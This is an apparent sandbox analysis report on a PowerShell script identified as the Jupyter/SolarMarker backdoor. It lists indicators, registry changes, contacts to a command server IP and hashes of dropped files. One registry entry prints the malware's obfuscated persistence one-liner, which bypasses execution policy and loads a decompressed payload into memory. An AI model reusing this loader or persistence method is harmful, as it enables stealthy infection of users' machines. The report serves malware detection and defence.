Analysis Overview
SHA256
5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
Threat Level: Known bad
The file script.ps1 was found to be: Known bad.
Malicious Activity Summary
Jupyter Backdoor/Client payload
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2023-04-13 14:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-13 14:26
Reported
2023-04-13 14:37
Platform
win10-20230220-en
Max time kernel
642s
Max time network
653s
Command Line
Signatures
Jupyter Backdoor/Client payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4452 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4452 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2568 wrote to memory of 3576 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 2568 wrote to memory of 3576 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 37.221.114.23:80 | | tcp |
| JP | 40.74.98.192:443 | | tcp |
| US | 8.8.8.8:53 | 62.13.109.52.in-addr.arpa | udp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| US | 8.8.8.8:53 | 126.24.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
| DE | 37.221.114.23:80 | | tcp |
Files
memory/4452-125-0x000001C947260000-0x000001C947282000-memory.dmp
memory/4452-127-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-128-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-132-0x000001C947390000-0x000001C947406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gayoq4ud.szc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline
| MD5 | b82b3c610b1bd22fea2daca6e6fcbaea |
| SHA1 | 6f18be10592e3d1a4da6343ddcac726f9329ac4f |
| SHA256 | 16319d856ba93120b0e55efcfe44abadc942751e8afb5956d5ddc5a535489e5e |
| SHA512 | 7246e8d7b9f86dc034fa5ef5f28547c08a6f6394a8b18002b2c0dc04709aaf3d12bd42600f1c3a0d17efd410ee7f993f493eaac35d034ed60a8d566159ddddf9 |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.0.cs
| MD5 | dae076349c85f1ed8db78fd3bd75473c |
| SHA1 | 33be9fc7f764edae76f95fe28f452b740a75d809 |
| SHA256 | 9e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156 |
| SHA512 | ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923 |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP
| MD5 | 244e097abf9183ad1e323ed52c620503 |
| SHA1 | be6815fe1b4930e5ccf4ea9477b61938b36f4c67 |
| SHA256 | 5455ec4c2d6b5f5dba18ec1d2870ec3d47ad993174f0f21e19fb0a6e502f60d6 |
| SHA512 | 2e61664cd3b946c133bd6dcc7adbc000dfb51f90964e0c7b6c91ca4f8fc2e683c946a3bd62c76d3237ca5f4ddd66bce277aea4dd788c10a62155d5d72ffced07 |
C:\Users\Admin\AppData\Local\Temp\RES618D.tmp
| MD5 | 90f78bb940a4b01dda650b86097b948b |
| SHA1 | e3828a76059b8a7a5a197da0cde7acac6ec79c23 |
| SHA256 | 4c94e3efadc2a9674a3082ce77f8b5e441da143149315c15058ab37703d73ea1 |
| SHA512 | 7889708aea0ef18425f5b10328354b7199119f85dbc3eaef01ce2e7bbcf5019f6ab5fc75b853560c570ca315c46f0a65c3c89742b16846ad14a92dee07030eec |
C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.dll
| MD5 | 73520d2b97645d9989fb0f5bb1aba355 |
| SHA1 | 84ece3730dcdc6ae9dc336f397f43d1ec61dbce6 |
| SHA256 | d39562cabdf944a784e353b60c0e9ecbccb0102ff718aae74e0ef38b2efcdefa |
| SHA512 | 478138a3b2a427d07c99aae399e79eadbeb66386f5d5dc5d8b8c2883fe8536ad3ed0583f10eed5a8254bebd863c130f19c61341f0a4a86e1387fae90949b07ba |
memory/4452-159-0x000001C9471A0000-0x000001C9471A8000-memory.dmp
memory/4452-194-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\DKgktXvNZPFr.RGQqJyjbphVErkPTA
| MD5 | 27ae639baac5a409329887445c77646f |
| SHA1 | 8870aca8b8b0972c72f6ed23b07556ac83439558 |
| SHA256 | 555d9fab18e5be0bffcb8cb097286be783bf4c8479b71cc33e382743c686ed54 |
| SHA512 | 7434209a5e41842148d17c051c8ea17492b7949bcca5bc1334fb82f744bfbb449648f601ae805fd21efe04749d0e335c68d288add0a79566b24051096ff6e2c0 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\zNadBQkwFgH.BYydUsvQFngElaxMeNt
| MD5 | 0dd9a25dc9e735a89b895f1fe87633ff |
| SHA1 | 91bdb2d46c6d96b97032e6726e896fcffd3fa1fb |
| SHA256 | b7a430f41cabcf2d1cc9905c7db08887a8f8861f9a98cd097762272412760ec6 |
| SHA512 | 1922bb2d7a371ad0b5a1470df88eb3a0b934ed1e361d0c05900f08b04d2aeb13e6cdd585ea0a2a027067572ea90e3ca4b514b01fa927e6a2e86eaf168f083f3d |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\MlUejLxHGgWDzqpS.VAMEOGeaouZvLrFcht
| MD5 | 1139720144032052eb01c6741a039197 |
| SHA1 | 5f1425d9261ec400d90743a91f5fe9674caa5c4d |
| SHA256 | 0d3805f498980feb2c2b247990fee00b217609850bb892be1ed2af3588577434 |
| SHA512 | 928987d79463fdf02a65629089b7d8f8891b1e356e8e475799ec1554ef9f84bf0faa455f8fa460f87e9a6ef26510a324380e4515a11f974117e55750bb01f09a |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\yeIhBUKQbW.iStXzqQUYKaDCn
| MD5 | 16367ac998221144710b9ffd6d031b17 |
| SHA1 | 699746b2bf59a22205f4882b0528190b08ada96d |
| SHA256 | 14079a86451292bda035cc4cd17638b4ef4edaa4a6ced9d81b1f10a1377607de |
| SHA512 | 51452d16ff6b632d8c3982a2dba2de63c6fc386010c7a6fbbfca2c93af5e47460d717296b2c940618e5b7c15314d4b419bbadfacfbe8db55fb582e22c98c21e3 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\jbohTScZsKkXNRuzQ.UsadtGHOvVqoukKhPcW
| MD5 | e155224cda1a9854fe57af90bcb5b475 |
| SHA1 | d8030992f15f0aba20e51bce03cfd58b0be4df88 |
| SHA256 | 7ca9fcf2fbbc599995b31849698b909602e8cacd501f4bfbfa3ca7d0e504b028 |
| SHA512 | e00a6202a841bd1d6180a62ccade7340cb4ac1ecf7829bc64d60909f9c5ce8f8b2720155676a41833149efa586343811d9fb897fb3d504b33f25929a4a11db78 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ASZQaXouDB.RkaAzwDjeUdspfto
| MD5 | acb79c1192de5be950567a971a40b5b9 |
| SHA1 | a19d8aad3dd2ef9560489972141be7d78e5d04b1 |
| SHA256 | 01b4f03cb41dc3881dd052e466b528ac7073661aeef24596f480614fa7eb8e32 |
| SHA512 | 88fa9bdcfa5ac8a81e36191e0bbb159b4bbd66a4f7bd26c28891bd76b68cfccb12f1989ff6772f792812d0c11ee82b9cc274a2a2ccebdf5bfde0747aaaaa593d |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\AFqJfBoXcuCSZtsT.YoiMWFrqHSLzjkCexb
| MD5 | 67502090d0cf262d4a14c19dfe69f524 |
| SHA1 | 9b87390eed9e8afdf246e9148022244277ef5b13 |
| SHA256 | 07fef04ad77fe166172937b8e9e38c2a9558a5c9da152f8430e122b54e7d83de |
| SHA512 | 2af2fb8620e95c04c2c6011370c6b5ee581cd91a04415a79f8f355baa59c6a682148c810a769bedd73d510c67d48921831d68fcc22c4eb8ae63ca09f7f339556 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\oUbxfLjgKmXrdcT.FfHSadwzqrZTLg
| MD5 | a30104996081729cabdca7b08655e843 |
| SHA1 | dbc4fd5547f6d8c5365d7d6cca65d44647d868ba |
| SHA256 | f3e32db459cab4f0db05919cc9f0652caf6eeaeeca25af82e843c7282f473ded |
| SHA512 | 68f7d7061acd8b367a7d44c9a20462621628c8d948d80c663ff8d16cba1edf7313001aec4591e39b5c7580b6dea675b673b4755915d2078886f1d85b65bf3257 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\LnerWMBgjOSDcPliyzT.VtcNxBAgkWa
| MD5 | e2ff7820f8b7579747a670419a3aa125 |
| SHA1 | c09f64cd5dc0513804d6bebcb1c8c006c73fcc82 |
| SHA256 | 7dabd2c07f0659c4eac0213a444e1ee2d587233858ce57edafa5ac381cb5b662 |
| SHA512 | f28882cff20694499f5a44d1bb2c80a127d57a21015dd855bcc9223630095ed8410ec63a3c8441b6f4112a848fc9868e7d8ab9b1d8a5af74fa1443bae41015a1 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\bBVJEpqwhSOFXIGYm.uHSbcxtRyWIhlps
| MD5 | a057f748414f4673fe67793265d72453 |
| SHA1 | e856da5a9a93b6e7f02e9aec8459dc1b471abca3 |
| SHA256 | 440714233f9df4549f0a6821152a74f8fb6f31519637cbfc9c2a71692f93cc80 |
| SHA512 | a27a17edee733605754fdbdee955a606d5c0544eed7e14fa6d82da83e1808ec306a67e490c4d1b140f374ecb532943048b9b7476a0ef3d7b7630014174c78121 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ftTzqRAwCP.rckJNulozCVsPaMX
| MD5 | 93035478adf3b3aafdd26edfd09b53b3 |
| SHA1 | 79c924286ddb2e1d3f808437d777b06f061bb737 |
| SHA256 | 449161c6e76077628f02136ecc85b324a8a95aa59db6514607c157b7b7e3c9b1 |
| SHA512 | 5c56c022a828933f79c827f1cebc9111976d92454ae2b6ff5672f05bf672dcd649d852e33678bae5e5f1260152439d094cc1c1e2ba6de999bcb475e5442b72b2 |
memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp
memory/4452-367-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-368-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-369-0x000001C92CD00000-0x000001C92CD10000-memory.dmp